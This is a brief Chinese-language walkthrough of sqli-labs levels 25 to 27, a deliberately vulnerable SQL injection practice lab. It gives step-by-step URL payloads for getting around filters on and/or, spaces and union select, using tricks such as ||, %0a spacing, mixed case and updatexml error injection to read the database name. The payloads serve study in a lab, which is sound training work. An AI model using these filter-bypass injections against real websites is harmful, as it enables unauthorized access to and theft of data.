20、绕过去除and、or、union select、空格的sql注入

环境sqli-labs

less 25

1、输入特殊字符，报错

http://192.168.1.121/sqli/Less-25/?id=1

2、单引号闭合

3、输入and、or都会被过滤，报错，输入||正常，所以可以判断是大小写过滤

http://192.168.1.121/sqli/Less-25/?id=1’ and 1=1 --+

http://192.168.1.121/sqli/Less-25/?id=1’ or1=1 --+

http://192.168.1.121/sqli/Less-25/?id=1’ || 1=1 --+

less 26

一、输入特殊字符，看报错信息

http://192.168.1.121/sqli/Less-26/?id=1’

二、闭合语句没有效果，屏蔽了-，空格，or等等

http://192.168.1.121/sqli/Less-26/?id=1’ --+

三、重新构造闭合语句

http://192.168.1.121/sqli/Less-26/?id=1’ ||‘a’='a

这样就绕过了去空格

四、获取数据库名称

http://192.168.1.121/sqli/Less-26/?id=1’||updatexml(1,concat(’$’,(database())),0)||‘1’=‘1

less 27

一、输入特殊字符，报错

http://192.168.1.121/sqli/Less-27/?id=1’

二、由于过滤了特殊符号，构造如下闭合语句

http://192.168.1.121/sqli/Less-27/?id=1’ ||'1

三、通过union查询

http://192.168.1.121/sqli/Less-27/?id=1’ union select 1,2,3 ||'1

union、select屏蔽了，空格也屏蔽了

四、union.select大小写替换一下，空格用/%0a/替换

http://192.168.1.121/sqli/Less-27/?id=0’/%0a/uniOn/%0a/seLect/%0a/1,2,3%20||'1

五、获取数据库名称

http://192.168.1.121/sqli/Less-27/?id=0’/%0a/uniOn/%0a/seLect/%0a/1,database(),3||'1

禁止非法，后果自负